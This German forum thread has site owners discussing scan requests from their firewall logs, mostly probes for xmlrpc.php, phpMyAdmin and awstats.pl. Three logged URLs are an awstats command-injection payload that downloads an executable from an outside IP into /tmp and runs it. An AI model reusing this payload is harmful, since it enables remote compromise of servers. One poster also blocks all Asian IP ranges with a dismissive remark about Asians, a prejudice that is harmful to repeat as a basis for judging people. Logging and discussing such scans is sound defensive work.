Sind das lauter Webseiten Exploits?
 

Das ist die Ausbeute von gut 24 Stunden. Doppelte Einträge habe ich herausgelöscht. Die Anfragen werden bereits von meiner Firewall gefiltert, weil dummerweise alle die IP-Adresse in der URL verwenden.

EDIT siehe nächstes posting

Muss ich mir auch sorgen machen, wenn ich ein PHP Fotoscript laufen habe, oder nur eine Anwendung wie sie unten vorkommt. :confused:

http://myip/xmlsrv/xmlrpc.php
http://myip/xmlrpc/xmlrpc.php
http://myip/xmlrpc.php
http://myip/wordpress/xmlrpc.php
http://myip/phpgroupware/xmlrpc.php
http://myip/drupal/xmlrpc.php
http://myip/blogs/xmlsrv/xmlrpc.php
http://myip/blog/xmlsrv/xmlrpc.php
http://myip/blog/xmlrpc.php
http://myip/cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e1 74%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2fl isten%20216%2e102%2e212%2e115;echo%20YYY;echo|
http://myip/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e1 74%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2fl isten%20216%2e102%2e212%2e115;echo%20YYY;echo|
http://myip/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e1 74%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2fl isten%20216%2e102%2e212%2e115;echo%20YYY;echo|
http://myip/phpMyAdmin-2.6.2-rc1/main.php
http://myip/phpMyAdmin-2.6.3-rc1/main.php
http://myip/phpMyAdmin-2.6.3/main.php
http://myip/phpMyAdmin-2.6.3-pl1/main.php
http://myip/phpMyAdmin-2.6.0-pl1/main.php
http://myip/phpMyAdmin-2.6.0/main.php
http://myip/myadmin/main.php
http://myip/phpMyAdmin-2.2.6/main.php
http://myip/phpMyAdmin-2.2.3/main.php
http://myip/phpMyAdmin-2.5.1/main.php
http://myip/phpMyAdmin-2.5.4/main.php
http://myip/phpMyAdmin-2.5.6/main.php
http://myip/main.php
http://myip/mysql-admin/main.php
http://myip/mysqladmin/main.php
http://myip/phpmyadmin2/main.php
http://myip/admin/mysql/main.php
http://myip/admin/phpmyadmin/main.php
http://myip/admin/pma/main.php
http://myip/web/phpMyAdmin/main.php
http://myip/dbadmin/main.php
http://myip/db/main.php
http://myip/admin/main.php
http://myip/mysql/main.php
http://myip/PMA/main.php
http://myip/phpmyadmin/main.php
http://myip/phpmyadmin/index.php
http://myip/stats/awstats.pl
http://myip/scgi-bin/stats/awstats.pl
http://myip/cgi-bin/stats/awstats.pl
http://myip/scripts/awstats.pl
http://myip/scgi/awstats/awstats.pl
http://myip/cgi/awstats/awstats.pl
http://myip/scgi-bin/awstats/awstats.pl
http://myip/cgi-bin/awstats/awstats.pl
http://myip/awstats/awstats.pl
http://myip/scgi-bin/awstats.pl
http://myip/cgi/awstats.pl
http://myip/cgi-bin/awstats.pl
http://myip/b2evo/xmlsrv/xmlrpc.php
http://myip/b2/xmlsrv/xmlrpc.php
http://myip/blogtest/xmlsrv/xmlrpc.php
http://myip/blogs/xmlrpc.php
http://myip/community/xmlrpc.php
http://myip/x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist

Re: Sind das lauter Webseiten Exploits?
 

Solange Du immer die neuesten Versionen verwendest, brauchst Du dir eigentlich keine Sorgen zu machen

Mahlzeit.

Security Issues gelesen?

http://www.phpmyadmin.net/home_page/...e=PMASA-2005-7

In diesem Zusammenhang ...

http://www.php.net/ChangeLog-5.php#5.1.0

Go for it!

Deppate script kidies?
 

Muss den thread mal aufwärmen, ich schau zwar selten in meine firewall logs und speichere auch nur 3 Tage, aber gestern ist mir wieder so ein Depp aufgefallen, der 633 php bugs durchprobiert hat (in 2 Minuten).

Angefangen mit
1) http://xxx.xxx.xxx.xxx/phpmyadmin/main.php
2) http://xxx.xxx.xxx.xxx/administrator...2.8.2/main.php
.
.
.
633) http://xxx.xxx.xxx.xxx/phpMyAdmin/main.php

Ich mein ist das normal oder schon ein gezielter Angriff? :confused:
Vor 3 Jahren war es ja noch deutlich weniger.

Soll ich die IP (range) sperren oder ist das sowieso ein gekappter Rechner (hat'ne webseite)

Ich glaub' ich hab' z.Zt. gar keine php seite mehr laufen, nur mehr den speedtest mini. ;)

Jede Wette es ist eine asiatische IP. 9 von 10 Angriffen bzw. versuchte Anfriffe, die ich direkt oder indirekt 2007 mitbekommen habe, waren von einer asiatischen IP, insbesoneres China. Ich sperre daher alle asiatischen IP-Ranges die mir unterkommen (wenn geht schon im Router oder Switch bzw. Firewalls), wer braucht schon Asiaten auf seiner privaten oder regionalen gewerblichen Website?

Wird immer schlimmer, die Liste ist auf 1716 angewachsen. Das durchprobieren dauert mittlerweile zwischen 2 und 12min. :(

Chinesische IPs waren aber bisher keine dabei.